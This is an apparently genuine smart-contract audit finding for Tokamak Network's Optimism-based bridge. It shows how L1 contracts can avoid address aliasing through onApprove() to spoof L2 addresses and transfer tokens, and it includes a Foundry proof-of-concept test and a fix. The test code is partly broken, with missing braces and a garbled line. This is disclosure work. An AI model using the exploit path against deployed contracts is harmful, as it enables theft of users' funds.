sherlock-audit / 2024-08-tokamak-network-judging

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Issue H-1: L1 contract can evade aliasing, spoofing unowned L2 address


Found by

0x416, 0xlrivo, KingNFT, haxagon, obront


A key property of the Optimism bridge is that all contract addresses are aliased. This is to avoid a contract on L1 to be able to send messages as the same address on L2, because often these contracts will have different owners. However, using the onApprove() function, this aliasing can be evaded, giving L1 contracts this power.

Root Cause

When depositTransaction() is called on the Optimism Portal, we use the following check to determine whether to alias the from address:

address from =
    ((_sender != tx.origin) && !_isOnApproveTrigger) ? AddressAliasHelper.applyL1ToL2Alias(_sender) : _sender;

As we can see, this check does not alias the address is _isOnApproveTrigger = true.

This flag is set whenever the deposit is triggered via a call to onApprove(). However, it is entirely possible for a contract to use this flow, and therefore avoid being aliased.

Internal Preconditions


External Preconditions


Attack Path

  1. A contract on L1 is owned by a different user than the contract address on L2. This is typical, for example, with multisigs or safes that deployed using CREATE.
  2. It wants to send a message on behalf of the L2 contract. For example, it may want to call transfer() on an ERC20 to steal their tokens.
  3. It calls approveAndCall() on the Native Token on L1, including the message it wants to send on L2.
  4. This message is passed along to the Optimism Portal's onApprove() function, which sets the _isOnApproveTrigger flag to true, and doesn't alias the address.
  5. The result is that the L2 message comes from the unaliased L1 address, and arbitrary messages (including token transfers) can be performed on L2.


L1 contracts can send arbitrary messages from their own address on L2, allowing them to steal funds from the owners of the L2 contracts.


The following standalone test can be used to demonstrate this vulnerability:

// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import { stdStorage, StdStorage, Test, console } from "forge-std/Test.sol";
import { OptimismPortal2 } from "../src/L1/OptimismPortal2.sol";
import { Constants } from "../src/libraries/Constants.sol";
import { L2NativeToken } from "../src/L1/L2NativeToken.sol";
import { ResourceMetering } from "../src/L1/ResourceMetering.sol";

contract MaliciousSafe {}

contract DummySystemConfig {
    address public nativeTokenAddress;

    constructor(address nativeToken) {
        nativeTokenAddress = nativeToken;

    function resourceConfig() external view returns (ResourceMetering.ResourceConfig memory) {
        return Constants.DEFAULT_RESOURCE_CONFIG();

contract POC is Test {
    using stdStorage for StdStorage;

    OptimismPortal2 portal;
    L2NativeToken token;

    event TransactionDeposited(address indexed from, address indexed to, uint256 indexed version, bytes opaqueData);

    function setUp() public {
        token = new L2NativeToken();
        DummySystemConfig config = new DummySystemConfig(address(token));

        portal = new OptimismPortal2(0, 0);"systemConfig()").checked_write(address(config));


    function testZach_noAlias() public {
        // we are sending from a safe, which isn't owned on L2
        address from = address(new MaliciousSafe());

        // let's make some transaction data
        // for example, transfer our addresses USDC on L2 to another address
        address to = makeAddr("L2USDC");
        uint value = 0;
        uint32 gasLimit = 1_000_000;
        bytes memory message = abi.encodeWithSignature("transfer(address,uint256)", address(1), 100e18);
        bytes memory onApproveData = abi.encodePacked(to, value, gasLimit, message);

        // confirm that the deposit transaction is:
        // from: from (non aliased)
        // to: L2USDC
        vm.expectEmit(true, true, false, false);
        emit TransactionDeposited(from, to, 0, bytes(""));

        // now we use approve and call to send the deposit transaction
        token.approveAndCall(address(portal), 1, onApproveData);


The _sender != tx.origin check is correct, even in the case that the call came via onApprove(), so the additional logic can be removed.